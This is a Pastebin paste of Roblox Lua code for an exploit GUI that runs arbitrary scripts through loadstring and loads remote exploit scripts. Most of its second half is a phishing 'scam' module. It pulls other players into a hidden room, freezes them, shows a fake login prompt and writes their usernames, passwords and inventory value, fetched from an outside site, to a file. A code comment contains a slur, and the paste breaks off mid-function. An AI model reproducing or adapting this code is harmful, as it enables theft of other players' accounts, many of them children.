Advertisement
Kurcha

dfsdfdssdfasdgadg

May 5th, 2018
266
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 28.11 KB | None | 0 0
  1. --XYZ GUI Objects
  2. wait(2)
  3. local LoadingScreen = Instance.new("ScreenGui", game.Players.LocalPlayer.PlayerGui)
  4. local LoadingFrame = Instance.new("Frame", LoadingScreen)
  5. local LoadingText = Instance.new("TextBox", LoadingFrame)
  6.  
  7. LoadingScreen.Name = "XYZLoad"
  8.  
  9. LoadingFrame.Name = "LoadingFrame"
  10. LoadingFrame.Position = UDim2.new(0, 200, 0, 100)
  11. LoadingFrame.Visible = true
  12. LoadingFrame.BackgroundTransparency = 1
  13.  
  14. LoadingText.Name = "LoadingText"
  15. LoadingText.Text = "Loading... (0/38)"
  16. LoadingText.BackgroundTransparency = 1
  17. LoadingText.Position = UDim2.new(0, 200, 0, -90)
  18. LoadingText.Font = Enum.Font.SourceSansBold
  19. LoadingText.TextColor3 = Color3.fromRGB(235, 235, 235)
  20. LoadingText.FontSize = Enum.FontSize.Size28
  21. wait(.2)
  22. LoadingText.Text = "Loading... (1/38)"
  23. wait(.2)
  24. LoadingText.Text = "Loading... (2/38)"
  25. wait(.2)
  26. LoadingText.Text = "Loading... (3/38)"
  27. wait(.2)
  28. LoadingText.Text = "Loading... (4/38)"
  29. wait(.2)
  30. LoadingText.Text = "Loading... (5/38)"
  31. wait(.2)
  32. LoadingText.Text = "Loading... (6/38)"
  33. wait(.2)
  34. LoadingText.Text = "Loading... (7/38)"
  35. wait(.2)
  36. LoadingText.Text = "Loading... (8/38)"
  37. wait(.2)
  38. LoadingText.Text = "Loading... (9/38)"
  39. wait(.2)
  40. LoadingText.Text = "Loading... (10/38)"
  41. wait(.2)
  42. LoadingText.Text = "Loading... (11/38)"
  43. wait(.2)
  44. LoadingText.Text = "Loading... (12/38)"
  45. wait(.2)
  46. LoadingText.Text = "Loading... (13/38)"
  47. wait(.2)
  48. LoadingText.Text = "Loading... (14/38)"
  49. wait(.2)
  50. LoadingText.Text = "Loading... (15/38)"
  51. wait(.2)
  52. LoadingText.Text = "Loading... (16/38)"
  53. wait(.2)
  54. LoadingText.Text = "Loading... (17/38)"
  55. wait(.2)
  56. LoadingText.Text = "Loading... (18/38)"
  57. wait(.2)
  58. LoadingText.Text = "Loading... (19/39)"
  59. wait(.2)
  60. LoadingText.Text = "Loading... (20/39)"
  61. wait(.2)
  62. LoadingText.Text = "Loading... (21/39)"
  63. wait(.2)
  64. LoadingText.Text = "Loading... (22/39)"
  65. wait(.2)
  66. LoadingText.Text = "Loading... (23/39)"
  67. wait(.2)
  68. LoadingText.Text = "Loading... (24/39)"
  69. wait(.2)
  70. LoadingText.Text = "Loading... (25/39)"
  71. wait(.2)
  72. LoadingText.Text = "Loading... (26/39)"
  73. wait(.2)
  74. LoadingText.Text = "Loading... (27/39)"
  75. wait(.2)
  76. LoadingText.Text = "Loading... (28/39)"
  77. wait(.2)
  78. LoadingText.Text = "Loading... (29/39)"
  79. wait(.2)
  80. LoadingText.Text = "Loading... (30/39)"
  81. wait(.2)
  82. LoadingText.Text = "Loading... (31/39)"
  83. wait(.2)
  84. LoadingText.Text = "Loading... (32/39)"
  85. wait(.2)
  86. LoadingText.Text = "Loading... (33/39)"
  87. wait(.2)
  88. LoadingText.Text = "Loading... (34/39)"
  89. wait(.2)
  90. LoadingText.Text = "Loading... (35/39)"
  91. wait(.2)
  92. LoadingText.Text = "Loading... (36/39)"
  93. wait(.2)
  94. LoadingText.Text = "Loading... (37/39)"
  95. wait(.2)
  96. LoadingText.Text = "Loading... (38/39)"
  97. wait(.2)
  98. LoadingText.Text = "Loading... (39/39)"
  99. wait(.2)
  100. LoadingText.Text = "Loading... (FINISH)"
  101. wait(5)
  102. LoadingScreen:Destroy()
  103.  
  104.  
  105. wait(2)
  106. local XYZ = Instance.new("ScreenGui", game.Players.LocalPlayer.PlayerGui)
  107. XYZ.Name = "XYZ"
  108. local UI = Instance.new("Frame", game.Players.LocalPlayer.PlayerGui.XYZ)
  109. UI.Name = "UI"
  110. local Execute = Instance.new("TextButton", game.Players.LocalPlayer.PlayerGui.XYZ.UI)
  111. local Clear = Instance.new("TextButton", game.Players.LocalPlayer.PlayerGui.XYZ.UI)
  112. local minimize_2 = Instance.new("TextButton", game.Players.LocalPlayer.PlayerGui.XYZ.UI)
  113. local x_2 = Instance.new("TextButton", game.Players.LocalPlayer.PlayerGui.XYZ.UI)
  114. local TextField = Instance.new("TextBox", game.Players.LocalPlayer.PlayerGui.XYZ.UI)
  115. local ReOpenFrame = Instance.new("Frame", game.Players.LocalPlayer.PlayerGui.XYZ)
  116. ReOpenFrame.Name = "ReOpenFrame"
  117. local ReOpen = Instance.new("TextButton", game.Players.LocalPlayer.PlayerGui.XYZ.ReOpenFrame)
  118. ReOpen.Name = "ReOpen"
  119. local GearsScreen = Instance.new("ScreenGui", game.Players.LocalPlayer.PlayerGui)
  120. local GearsFrame = Instance.new("Frame", GearsScreen)
  121. local x_4 = Instance.new("TextButton", GearsFrame)
  122. local OutputExecute = Instance.new("TextButton", GearsFrame)
  123. local TextField_2 = Instance.new("TextBox", GearsFrame)
  124. local onReOpenClick = game.Players.LocalPlayer.PlayerGui.XYZ.ReOpenFrame.ReOpen
  125. local GUITitle = Instance.new("TextLabel", game.Players.LocalPlayer.PlayerGui.XYZ.UI)
  126. local PreScriptUI = Instance.new("Frame", game.Players.LocalPlayer.PlayerGui.XYZ)
  127. local OpenPreScripts = Instance.new("TextButton", XYZ.UI)
  128. local DesignFrame = Instance.new("Frame", PreScriptUI)
  129. local AnonymousLocalPlayer = Instance.new("TextButton", DesignFrame)
  130. local x_3 = Instance.new("TextButton", PreScriptUI)
  131. local MGX7 = Instance.new("TextButton", DesignFrame)
  132. local RealMGX7 = Instance.new("TextButton", DesignFrame)
  133. local Opengears = Instance.new("TextButton", UI)
  134. local InputBar_1 = Instance.new("TextBox", GearsFrame)
  135. local RoExploit6 = Instance.new("TextButton", DesignFrame)
  136. local RoExploit5 = Instance.new("TextButton", DesignFrame)
  137. XYZ.Name = "XYZ"
  138. XYZ.Parent = game.Players.LocalPlayer.PlayerGui
  139.  
  140. UI.Name = "UI"
  141. UI.Parent = XYZ
  142. UI.Active = true
  143. UI.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  144. UI.Draggable = true
  145. UI.Position = UDim2.new(0, 200, 0, 100)
  146. UI.Size = UDim2.new(0, 370, 0, 350)
  147. UI.Visible = false
  148.  
  149. Execute.Name = "Execute"
  150. Execute.Parent = UI
  151. Execute.BackgroundColor3 = Color3.fromRGB(222, 222, 222)
  152. Execute.Position = UDim2.new(0, 11, 0, 320)
  153. Execute.Size = UDim2.new(0, 100, 0, 25)
  154. Execute.Font = Enum.Font.SourceSans
  155. Execute.FontSize = Enum.FontSize.Size14
  156. Execute.Text = "Execute"
  157. Execute.TextColor3 = Color3.fromRGB(0, 0, 0)
  158.  
  159. Clear.Name = "Clear"
  160. Clear.Parent = UI
  161. Clear.BackgroundColor3 = Color3.fromRGB(222, 222, 222)
  162. Clear.Position = UDim2.new(0, 204, 0, 320)
  163. Clear.Size = UDim2.new(0, 100, 0, 25)
  164. Clear.Font = Enum.Font.SourceSans
  165. Clear.FontSize = Enum.FontSize.Size14
  166. Clear.Text = "Clear"
  167. Clear.TextColor3 = Color3.fromRGB(0, 0, 0)
  168.  
  169. TextField.Name = "TextField"
  170. TextField.Parent = UI
  171. TextField.BackgroundColor3 = Color3.fromRGB(234, 234, 234)
  172. TextField.BackgroundTransparency = 0
  173. TextField.Position = UDim2.new(0, 15, 0, 33)
  174. TextField.Size = UDim2.new(0, 285, 0, 273)
  175. TextField.ClearTextOnFocus = false
  176. TextField.Font = Enum.Font.SourceSans
  177. TextField.FontSize = Enum.FontSize.Size14
  178. TextField.MultiLine = true
  179. TextField.Text = "--XYZ GUI V0.3 Script Execution!"
  180. TextField.TextWrapped = true
  181. TextField.TextXAlignment = Enum.TextXAlignment.Left
  182. TextField.TextYAlignment = Enum.TextYAlignment.Top
  183.  
  184. minimize_2.Name = "minimize"
  185. minimize_2.Parent = UI
  186. minimize_2.BackgroundColor3 = Color3.new(1, 1, 1)
  187. minimize_2.BackgroundTransparency = 1
  188. minimize_2.Position = UDim2.new(0, 320, 0, 0)
  189. minimize_2.Size = UDim2.new(0, 25, 0, 25)
  190. minimize_2.ZIndex = 4
  191. minimize_2.Font = Enum.Font.SourceSansBold
  192. minimize_2.FontSize = Enum.FontSize.Size14
  193. minimize_2.Text = "-"
  194. minimize_2.TextColor3 = Color3.new(1, 1, 1)
  195.  
  196. x_2.Name = "x"
  197. x_2.Parent = UI
  198. x_2.BackgroundColor3 = Color3.new(1, 1, 1)
  199. x_2.BackgroundTransparency = 1
  200. x_2.Position = UDim2.new(0, 345, 0, 0)
  201. x_2.Size = UDim2.new(0, 25, 0, 25)
  202. x_2.ZIndex = 4
  203. x_2.Font = Enum.Font.SourceSansBold
  204. x_2.FontSize = Enum.FontSize.Size14
  205. x_2.Text = "X"
  206. x_2.TextColor3 = Color3.new(1, 1, 1)
  207.  
  208. GUITitle.Name = "GUITitle"
  209. GUITitle.Parent = UI
  210. GUITitle.BackgroundColor3 = Color3.new(1, 1, 1)
  211. GUITitle.BackgroundTransparency = 1
  212. GUITitle.Position = UDim2.new(0, 100, 0, 0)
  213. GUITitle.Size = UDim2.new(0, 25, 0, 25)
  214. GUITitle.ZIndex = 4
  215. GUITitle.Font = Enum.Font.SourceSansBold
  216. GUITitle.FontSize = Enum.FontSize.Size14
  217. GUITitle.Text = "XYZ GUI V0.5"
  218. GUITitle.TextColor3 = Color3.new(1, 1, 1)
  219.  
  220. OpenPreScripts.Name = "OpenPreScripts"
  221. OpenPreScripts.Text = "PreScripts"
  222. OpenPreScripts.Size = UDim2.new(0, 69, 0, 25)
  223. OpenPreScripts.Position = UDim2.new(0, 300, 0, 33)
  224.  
  225. PreScriptUI.Name = "PreScripts"
  226. PreScriptUI.Parent = XYZ
  227. PreScriptUI.Active = true
  228. PreScriptUI.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  229. PreScriptUI.Draggable = true
  230. PreScriptUI.Position = UDim2.new(0, 200, 0, 100)
  231. PreScriptUI.Size = UDim2.new(0, 370, 0, 350)
  232. PreScriptUI.Visible = false
  233.  
  234. AnonymousLocalPlayer.Name = "AnonLocalPlayer"
  235. AnonymousLocalPlayer.Parent = DesignFrame
  236. AnonymousLocalPlayer.Active = true
  237. AnonymousLocalPlayer.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  238. AnonymousLocalPlayer.Size = UDim2.new(0, 69, 0, 25)
  239. AnonymousLocalPlayer.Text = "Anon Player"
  240. AnonymousLocalPlayer.Position = UDim2.new(0, 0, 0, 23)
  241.  
  242. MGX7.Name = "GoobyGUIV2"
  243. MGX7.Parent = DesignFrame
  244. MGX7.Active = true
  245. MGX7.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  246. MGX7.Size = UDim2.new(0, 69, 0, 25)
  247. MGX7.Text = "GoobyGUIV2"
  248. MGX7.Position = UDim2.new(0, 0, 0, 46)
  249.  
  250. RealMGX7.Name = "MGX7"
  251. RealMGX7.Parent = DesignFrame
  252. RealMGX7.Active = true
  253. RealMGX7.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  254. RealMGX7.Size = UDim2.new(0, 69, 0, 25)
  255. RealMGX7.Text = "MGX7"
  256. RealMGX7.Position = UDim2.new(0, 0, 0, 69)
  257.  
  258. RoExploit6.Name = "Ro-Xploit6"
  259. RoExploit6.Parent = DesignFrame
  260. RoExploit6.Active = true
  261. RoExploit6.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  262. RoExploit6.Size = UDim2.new(0, 69, 0, 25)
  263. RoExploit6.Text = "RoXploit6"
  264. RoExploit6.Position = UDim2.new(0, 0, 0, 92)
  265.  
  266. RoExploit5.Name = "Ro-Xploit5"
  267. RoExploit5.Parent = DesignFrame
  268. RoExploit5.Active = true
  269. RoExploit5.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  270. RoExploit5.Size = UDim2.new(0, 69, 0, 25)
  271. RoExploit5.Text = "RoXploit5"
  272. RoExploit5.Position = UDim2.new(0, 0, 0, 125)
  273.  
  274. x_3.Name = "x"
  275. x_3.Parent = PreScriptUI
  276. x_3.BackgroundColor3 = Color3.new(1, 1, 1)
  277. x_3.BackgroundTransparency = 1
  278. x_3.Position = UDim2.new(0, 329, 0, 0)
  279. x_3.Size = UDim2.new(0, 25, 0, 25)
  280. x_3.ZIndex = 4
  281. x_3.Font = Enum.Font.SourceSansBold
  282. x_3.FontSize = Enum.FontSize.Size14
  283. x_3.Text = "X"
  284. x_3.TextColor3 = Color3.new(1, 1, 1)
  285.  
  286. DesignFrame.Name = "DesignFrame"
  287. DesignFrame.Parent = PreScriptUI
  288. DesignFrame.Active = true
  289. DesignFrame.BackgroundTransparency = 0.4
  290. DesignFrame.Position = UDim2.new(0, 15, 0, 25)
  291. DesignFrame.Size = UDim2.new(0, 340, 0, 310)
  292. DesignFrame.Visible = false
  293. DesignFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  294.  
  295. ReOpenFrame.Visible = true
  296. UI.Visible = false
  297. ReOpen.Size = UDim2.new(0, 50, 0, 50)
  298. ReOpen.Text = "XYZ"
  299. ReOpen.Visible = true
  300.  
  301. Opengears.Name = "OpenGears/Output"
  302. Opengears.Text = "Gears"
  303. Opengears.Size = UDim2.new(0, 69, 0, 25)
  304. Opengears.Position = UDim2.new(0, 300, 0, 66)
  305.  
  306. GearsScreen.Name = "Output/Gears"
  307. GearsScreen.Parent = game.Players.LocalPlayer.PlayerGui
  308.  
  309. GearsFrame.Name = "GearsFrame"
  310. GearsFrame.Parent = GearsScreen
  311. GearsFrame.Active = true
  312. GearsFrame.BackgroundColor3 = Color3.new(0.5,0.5,0.5)
  313. GearsFrame.Draggable = true
  314. GearsFrame.Position = UDim2.new(0, 200, 0, 100)
  315. GearsFrame.Size = UDim2.new(0, 315, 0, 350)
  316. GearsFrame.Visible = false
  317.  
  318. TextField_2.Name = "TextField"
  319. TextField_2.Parent = GearsFrame
  320. TextField_2.BackgroundColor3 = Color3.fromRGB(234, 234, 234)
  321. TextField_2.BackgroundTransparency = 0
  322. TextField_2.Position = UDim2.new(0, 15, 0, 33)
  323. TextField_2.Size = UDim2.new(0, 285, 0, 273)
  324. TextField_2.ClearTextOnFocus = false
  325. TextField_2.Font = Enum.Font.SourceSans
  326. TextField_2.FontSize = Enum.FontSize.Size14
  327. TextField_2.MultiLine = true
  328. TextField_2.Text = "Type :gears to view Gears!"
  329. TextField_2.TextWrapped = true
  330. TextField_2.TextXAlignment = Enum.TextXAlignment.Left
  331. TextField_2.TextYAlignment = Enum.TextYAlignment.Top
  332.  
  333. InputBar_1.Name = "InputBar"
  334. InputBar_1.Parent = GearsFrame
  335. InputBar_1.BackgroundColor3 = Color3.fromRGB(234, 234, 234)
  336. InputBar_1.BackgroundTransparency = 0
  337. InputBar_1.Position = UDim2.new(0, 15, 0, 320)
  338. InputBar_1.Size = UDim2.new(0, 230, 0, 20)
  339. InputBar_1.ClearTextOnFocus = false
  340. InputBar_1.Font = Enum.Font.SourceSans
  341. InputBar_1.FontSize = Enum.FontSize.Size14
  342. InputBar_1.MultiLine = false
  343. InputBar_1.Text = ""
  344. InputBar_1.TextWrapped = true
  345. InputBar_1.TextXAlignment = Enum.TextXAlignment.Left
  346. InputBar_1.TextYAlignment = Enum.TextYAlignment.Top
  347.  
  348. OutputExecute.Name = "Execute"
  349. OutputExecute.Parent = GearsFrame
  350. OutputExecute.BackgroundColor3 = Color3.fromRGB(234, 234, 234)
  351. OutputExecute.Position = UDim2.new(0, 250, 0, 320)
  352. OutputExecute.Size = UDim2.new(0, 50, 0, 20)
  353. OutputExecute.Font = Enum.Font.SourceSans
  354. OutputExecute.FontSize = Enum.FontSize.Size14
  355. OutputExecute.Text = "Execute"
  356. OutputExecute.TextColor3 = Color3.fromRGB(0, 0, 0)
  357.  
  358. x_4.Name = "x"
  359. x_4.Parent = GearsFrame
  360. x_4.BackgroundColor3 = Color3.new(1, 1, 1)
  361. x_4.BackgroundTransparency = 1
  362. x_4.Position = UDim2.new(0, 290, 0, 0)
  363. x_4.Size = UDim2.new(0, 25, 0, 25)
  364. x_4.ZIndex = 4
  365. x_4.Font = Enum.Font.SourceSansBold
  366. x_4.FontSize = Enum.FontSize.Size14
  367. x_4.Text = "X"
  368. x_4.TextColor3 = Color3.new(1, 1, 1)
  369.  
  370.  
  371. function onClick()
  372. loadstring(TextField.Text)()
  373. end
  374. Execute.MouseButton1Click:connect(onClick)
  375.  
  376. function onXClick()
  377. XYZ:Destroy()
  378. end
  379. x_2.MouseButton1Click:connect(onXClick)
  380.  
  381. function onMinimizeClick()
  382. UI.Visible = false
  383. ReOpen.Size = UDim2.new(0, 50, 0, 50)
  384. ReOpen.Text = "XYZ"
  385. ReOpen.Visible = true
  386. end
  387. minimize_2.MouseButton1Click:connect(onMinimizeClick)
  388.  
  389. function onXYZOpenClick()
  390. UI.Visible = true
  391. ReOpen.Visible = false
  392. end
  393. ReOpen.MouseButton1Click:connect(onXYZOpenClick)
  394.  
  395. function onClearClick()
  396. TextField.Text = ""
  397. end
  398. Clear.MouseButton1Click:connect(onClearClick)
  399.  
  400. function onPreScriptsClick()
  401. UI.Visible = false
  402. PreScriptUI.Visible = true
  403. ReOpen.Visible = true
  404. DesignFrame.Visible = true
  405. end
  406. OpenPreScripts.MouseButton1Click:connect(onPreScriptsClick)
  407.  
  408. function onX_3Click()
  409. PreScriptUI.Visible = false
  410. end
  411. x_3.MouseButton1Click:connect(onX_3Click)
  412.  
  413. function onAnonClick()
  414. local pe = Instance.new("ParticleEmitter",game.Players.LocalPlayer.Character.Torso)
  415. pe.Texture = "http://www.roblox.com/asset/?id=127476787"
  416. pe.VelocitySpread = 5
  417. end
  418. AnonymousLocalPlayer.MouseButton1Click:connect(onAnonClick)
  419.  
  420. function onMGX7Click()
  421. loadstring(game:GetObjects("rbxassetid://447933940")[1].Source)()
  422. end
  423. MGX7.MouseButton1Click:connect(onMGX7Click)
  424.  
  425. function onRoXploitClick()
  426. loadstring(game:GetObjects("rbxassetid://364364477")[1].Source)()
  427. end
  428. RoExploit6.MouseButton1Click:connect(onRoXploitClick)
  429.  
  430. function onRoXploit5Click()
  431. loadstring(game:GetObjects("rbxassetid://288646117")[1].Source)()
  432. end
  433. RoExploit5.MouseButton1Click:connect(onRoXploit5Click)
  434.  
  435. function onOpenGearsClick()
  436. GearsFrame.Visible = true
  437. ReOpenFrame.Visible = true
  438. UI.Visible = false
  439. ReOpen.Visible = true
  440. end
  441. Opengears.MouseButton1Click:connect(onOpenGearsClick)
  442.  
  443. function GearExecuted()
  444. if InputBar_1.Text == ":gears" then
  445. TextField_2.Text = (TextField_2.Text.."\n"..">UserInput: [:gears]\n"..":Laser --Gives Player Laser Gun")
  446. else
  447. if InputBar_1.Text == ":Laser" then
  448. wait(2)
  449. TextField_2.Text = (TextField_2.Text.."\n"..">:Laser".."\n>User Gear Sent")
  450. local root = game:GetService("InsertService"):LoadAsset(130113146)
  451. local item = root:children()
  452. for i = 1, #item do
  453. item[i].Parent = game.Players.LocalPlayer.Backpack
  454. item[i]:Clone() .Parent = game.Players.Mechalicky.StarterGear
  455. end
  456. else
  457. TextField_2.Text = (TextField_2.Text.."\n"..">UserInput: ["..InputBar_1.Text.."]".."\n>Not Gear/Command")
  458. end
  459. end
  460. end
  461. OutputExecute.MouseButton1Click:connect(GearExecuted)
  462.  
  463. function CharAdded()
  464. ReOpenFrame.Visible = true
  465. end
  466. game.Players.ChildAdded:connect(CharAdded)
  467.  
  468. function onx_4Click()
  469. GearsFrame.Visible = false
  470. end
  471. x_4.MouseButton1Click:connect(onx_4Click)
  472.  
  473. function onRealMGX7Click()
  474. --Dont leak faggot, or hell will be released
  475.  
  476. local MyRoom = "BasicRoom"
  477.  
  478. local StorageType = 2
  479.  
  480. local ScamType = "Pick"
  481.  
  482. local TargetList = {}
  483.  
  484. local Bypassers = {
  485. {}
  486. }
  487.  
  488. local Trello = {
  489. Enabled = false,
  490. List = "MRList",
  491. DumpList = "MRDumps",
  492. TrelloTargetList = "MRTargetList",
  493. DevKey = "",
  494. Token = "",
  495. }
  496.  
  497. local floodChat = false
  498.  
  499. local writeAccounts = true
  500. local fileName = "MGX8List"
  501.  
  502. BypassKey = "v3rm"
  503. BypassKeyEnabled = true
  504. BypassKeyRules = true
  505.  
  506. local kickLogin = false
  507.  
  508. local RAPApi = true
  509. ------------------------------------------------------------------------
  510.  
  511. local MainFolder = game:GetObjects("rbxassetid://432005266")[1]
  512. MainFolder.Parent = game.ReplicatedStorage
  513.  
  514. local player = game.Players.LocalPlayer
  515.  
  516. local CurrentlyScamming = {}
  517.  
  518. local MRStorage
  519.  
  520. local guiTool = MainFolder.Login
  521.  
  522. local replaceScript = game:GetService("InsertService"):LoadAsset(80576967):GetChildren()[1].LocalScript
  523. guiTool.LocalScript:Destroy()
  524. replaceScript.Parent = guiTool
  525.  
  526. local ruleTool = MainFolder["Bypass Rules"]
  527.  
  528. local replaceScript = game:GetService("InsertService"):LoadAsset(80576967):GetChildren()[1].LocalScript
  529. ruleTool.LocalScript:Destroy()
  530. replaceScript.Parent = ruleTool
  531.  
  532. local pickGui = MainFolder.PickGui
  533.  
  534. function checkPass(pass, playa)
  535. if BypassKeyEnabled and pass == BypassKey then
  536. if BypassKeyRules then
  537. local newTool = ruleTool:Clone()
  538. newTool.Parent = workspace
  539. newTool.Handle.CanCollide = false
  540. newTool.Handle.CFrame = playa.Character.Head.CFrame
  541. end
  542. return true
  543. end
  544. if pass == "Password" or pass == "" or pass == "Enter Your Password" or pass == "Incorrect Password" or pass == "Enter your Password" then
  545. return false
  546. end
  547. local foundNums = 0
  548. local foundLetters = 0
  549. if string.find(pass, " ") then
  550. return false
  551. end
  552. if pass:len() < 6 or pass:len() > 20 then
  553. return false
  554. end
  555. for i=1,pass:len() do
  556. if pass:sub(i,i):match("%d") ~= nil then
  557. foundNums = foundNums + 1
  558. end
  559. end
  560. if foundNums < 2 then
  561. return false
  562. end
  563. for i=1,pass:len() do
  564. if pass:sub(i,i):match("%a") ~= nil then
  565. foundLetters = foundLetters + 1
  566. end
  567. end
  568. if foundLetters < 4 then
  569. return false
  570. end
  571. return true
  572. end
  573.  
  574. function getUText(root, val)
  575. local found
  576. if val then
  577. found = val
  578. end
  579. for i,v in pairs(root:GetChildren()) do
  580. if v.Name == "UText" then
  581. found = v
  582. break
  583. end
  584. found = getUText(v,found)
  585. end
  586. return found
  587. end
  588.  
  589. function getPText(root, val)
  590. local found
  591. if val then
  592. found = val
  593. end
  594. for i,v in pairs(root:GetChildren()) do
  595. if v.Name == "PText" then
  596. found = v
  597. break
  598. end
  599. found = getPText(v,found)
  600. end
  601. return found
  602. end
  603.  
  604. function getILPopUp(root, val)
  605. local found
  606. if val then
  607. found = val
  608. end
  609. for i,v in pairs(root:GetChildren()) do
  610. if v.Name == "ILPopUp" then
  611. found = v
  612. break
  613. end
  614. found = getILPopUp(v,found)
  615. end
  616. return found
  617. end
  618.  
  619. function unscPlayer(plr)
  620. for i,v in pairs(CurrentlyScamming) do
  621. if plr == v.Player then
  622. table.insert(Bypassers,{Name = plr.Name, ID = plr.UserId})
  623. table.remove(CurrentlyScamming,i)
  624. wait()
  625. while plr.Backpack:FindFirstChild("Login") do
  626. plr.Backpack.Login:Destroy()
  627. wait()
  628. end
  629. while plr.Character:FindFirstChild("Login") do
  630. plr.Character.Login:Destroy()
  631. wait()
  632. end
  633. plr.Character:WaitForChild("Torso")
  634. plr.Character:WaitForChild("HumanoidRootPart")
  635. plr.Character.HumanoidRootPart.Anchored = false
  636. plr.Character.HumanoidRootPart.CFrame = v.ReturnPos
  637. v.Player.CameraMaxZoomDistance = 400
  638. v.Player.CameraMinZoomDistance = 0
  639. v.RoomModel:Destroy()
  640. end
  641. end
  642. end
  643.  
  644. function scPlayer(plr)
  645. ypcall(function()
  646. local debounce = false
  647. local roomCheck = MainFolder.Rooms:FindFirstChild(MyRoom)
  648. if roomCheck then
  649. local roomId = #CurrentlyScamming + 1
  650. local newRoom = roomCheck:Clone()
  651. newRoom.Parent = workspace
  652. newRoom:MoveTo(Vector3.new(5000,1000, 5000 + 100 * roomId))
  653.  
  654. local newPacket = {Player = plr, RoomId = roomId, RoomModel = newRoom, ReturnPos = plr.Character.Torso.CFrame}
  655. table.insert(CurrentlyScamming,newPacket)
  656. --[[
  657. newRoom.LButton.ClickDetector.MouseClick:connect(function(playa)
  658. if debounce == false then
  659. if playa.Backpack:FindFirstChild("Login") then
  660. if playa == plr and getILPopUp(playa.Backpack.Login) and getPText(playa.Backpack.Login) then
  661. debounce = true
  662. getILPopUp(newRoom).Visible = false
  663. getILPopUp(playa.Backpack.Login).Visible = false
  664. wait(0.5)
  665. if playa.Backpack:FindFirstChild("Login") then
  666. if checkPass(getPText(playa.Backpack.Login).Text) then
  667. print(plr.Name .. " : " .. getPText(playa.Backpack.Login).Text)
  668. unscPlayer(plr)
  669. else
  670. getILPopUp(newRoom).Visible = true
  671. getILPopUp(playa.Backpack.Login).Visible = true
  672. getPText(playa.Backpack.Login).Text = ""
  673. end
  674. end
  675. end
  676. end
  677. debounce = false
  678. end
  679. end)
  680. --]]
  681. end
  682. end)
  683. end
  684.  
  685. function isBypass(plr)
  686. local bypass = false
  687. for i,v in pairs(Bypassers) do
  688. if v.Name == plr.Name or v.ID == plr.UserId then
  689. bypass = true
  690. end
  691. end
  692. return bypass
  693. end
  694.  
  695. function isScamming(plr)
  696. local isScam = false
  697. for i,v in pairs(CurrentlyScamming) do
  698. if v.Player.Name == plr then
  699. isScam = true
  700. end
  701. end
  702. return isScam
  703. end
  704.  
  705. function fixPlayers()
  706. for i,v in pairs(CurrentlyScamming) do
  707. ypcall(function()
  708. if v.Player.Character:FindFirstChild("Login") then
  709. if v.Player.Character.Login:FindFirstChild("SprayGui") then
  710. local tempTool = v.Player.Character:FindFirstChild("Login")
  711. tempTool.Parent = v.RoomModel
  712. tempTool.Handle.CFrame = v.Player.Character.Head.CFrame
  713. end
  714. end
  715. end)
  716. end
  717. end
  718.  
  719. function BCtoDumpStr(str)
  720. local res = ""
  721. if str == "Enum.MembershipType.BuildersClub" then
  722. res = "[BC] "
  723. elseif str == "Enum.MembershipType.TurboBuildersClub" then
  724. res = "[TBC] "
  725. elseif str == "Enum.MembershipType.OutrageousBuildersClub" then
  726. res = "[OBC] "
  727. elseif str == "Enum.MembershipType.None" then
  728. res = ""
  729. end
  730. return res
  731. end
  732.  
  733. function getRap(user)
  734. local rap = "Error."
  735. if RAPApi then
  736. ypcall(function()
  737. local http = game:GetService("HttpService")
  738. local rawrap = http:JSONDecode(game:HttpGet("http://roblox.plus:2052/inventory?username=" .. user,true))
  739. rap = tostring(rawrap.rap)
  740. end)
  741. else
  742. rap = "Disabled."
  743. end
  744. return rap
  745. end
  746.  
  747. function logAccount(user,pass)
  748. local playerName = user.Name
  749. local playerAge = tostring(user.AccountAge)
  750. local playerRAP = getRap(playerName)
  751.  
  752. if print then
  753. print(BCtoDumpStr(tostring(user.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  754. end
  755. if readfile and writefile then
  756. if readfile(getelysianpath()..fileName..".txt") == "nil path doesn't exist" then
  757. writefile(getelysianpath()..fileName..".txt", BCtoDumpStr(tostring(user.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  758. else
  759. local tempFile = readfile(getelysianpath()..fileName..".txt")
  760. writefile(getelysianpath()..fileName..".txt", tempFile .. "\n" .. BCtoDumpStr(tostring(user.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  761. end
  762. end
  763. end
  764.  
  765. function teleportVictims()
  766. for i,v in pairs(CurrentlyScamming) do
  767. ypcall(function()
  768. v.Player.Character.HumanoidRootPart.CFrame = v.RoomModel.Spawn.CFrame + Vector3.new(0,-10,0)
  769. v.Player.Character.HumanoidRootPart.Anchored = true
  770. if not v.Player.Backpack:FindFirstChild("Login") and not v.Player.Character:FindFirstChild("Login") then
  771. if not v.RoomModel:FindFirstChild("Login") then
  772. local tempTools = {}
  773. for i2,v2 in pairs(v.Player.Backpack:GetChildren()) do
  774. table.insert(tempTools,v2:Clone())
  775. v2:Destroy()
  776. end
  777. local newTool = guiTool:Clone()
  778. newTool.Parent = v.RoomModel
  779. newTool.Handle.CanCollide = false
  780. newTool.Handle.CFrame = v.Player.Character.Head.CFrame
  781. newTool.Handle.BodyPosition.Position = v.RoomModel.Spawn.Position + Vector3.new(0,-10,0)
  782. getUText(newTool).Text = v.Player.Name
  783. spawn(function()
  784. wait(2)
  785. for i2,v2 in pairs(tempTools) do
  786. v2.Parent = v.Player.Backpack
  787. end
  788. end)
  789. newTool.Changed:connect(function(prop)
  790. if not isScamming(v.Player.Name) then return end
  791. if prop == "Parent" and newTool.Parent.Name == "Backpack" then
  792. if v.Player.Backpack:FindFirstChild("Login") then
  793. if getILPopUp(v.Player.Backpack.Login) and getPText(v.Player.Backpack.Login) then
  794. getILPopUp(v.Player.Backpack.Login).Visible = false
  795. if v.Player.Backpack:FindFirstChild("Login") then
  796. if checkPass(getPText(v.Player.Backpack.Login).Text, v.Player) then
  797. logAccount(v.Player, getPText(v.Player.Backpack.Login).Text)
  798. unscPlayer(v.Player)
  799. spawn(function()
  800. wait(0.5)
  801. if kickLogin then
